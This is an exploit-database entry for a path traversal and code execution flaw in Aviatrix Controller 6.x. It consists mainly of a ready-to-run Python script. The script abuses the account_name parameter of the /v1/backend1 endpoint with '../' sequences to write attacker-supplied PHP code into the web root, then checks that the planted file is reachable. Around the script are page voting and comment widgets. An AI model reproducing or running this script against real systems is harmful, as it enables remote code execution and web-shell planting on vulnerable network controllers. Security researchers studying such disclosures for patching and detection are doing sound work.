Aviatrix Controller 6.x Path Traversal / Code Execution

2021.10.11
Credit: 0xJoyGhosh
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-22

#!/usr/bin/env python3 import requests from requests.structures import CaseInsensitiveDict from colorama import Fore, Style import argparse from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) print(f""" ░█▀▀█ ░█──░█ ░█▀▀▀ ── █▀█ █▀▀█ █▀█ ▄█─ ── ─█▀█─ █▀▀█ ▄▀▀▄ ▄▀▀▄ █▀▀█ ░█─── ─░█░█─ ░█▀▀▀ ▀▀ ─▄▀ █▄▀█ ─▄▀ ─█─ ▀▀ █▄▄█▄ █▄▀█ ▄▀▀▄ █▄▄─ █▄▀█ ░█▄▄█ ──▀▄▀─ ░█▄▄▄ ── █▄▄ █▄▄█ █▄▄ ▄█▄ ── ───█─ █▄▄█ ▀▄▄▀ ▀▄▄▀ █▄▄█ Author : 0xJoyGhosh Org : System00 Security Twitter: @0xjoyghosh """) try: parser = argparse.ArgumentParser() parser.add_argument("-u", "--url", help="Enter Target Url With scheme Ex: -u https://avaitix.target.com", type=str) parser.add_argument("-c", "--code", help="Enter php code Ex: -c '<?php phpinfo(); ?>' ", type=str) parser.add_argument("-n", "--name", help="Enter php code Ex: -n 'filename' ", type=str) args = parser.parse_args() url =f"{args.url}/v1/backend1" except TypeError: print("Type -h To See all the options") except(): exit() def exploit(url,path,code): headers = CaseInsensitiveDict() headers["Content-Type"] = "application/x-www-form-urlencoded" data = f'CID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/{path}.php&data={code}' resp = requests.post(url, headers=headers, data=data,verify=False) stat = requests.get(f"{args.url}/v1/{path}",verify=False) if resp.status_code==200: if stat.status_code==200: print(f"[ {Fore.RED} Exploited {Fore.BLACK}] [{Fore.GREEN}{args.url}/v1/{path}{Fore.BLACK} ]") print("") else: print("[ Exploit successful Creating File Failed ]") pass else: print(f'[{Fore.BLUE} Exploit Unsuccessful {Fore.BLUE}]') if args.url is not None: if args.code is not None: if args.name is not None: exploit(url,args.name,args.code) else: print('Type -h to see help Menu') else: print('Type -h to see help Menu') else: print('Type -h to see help Menu')


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top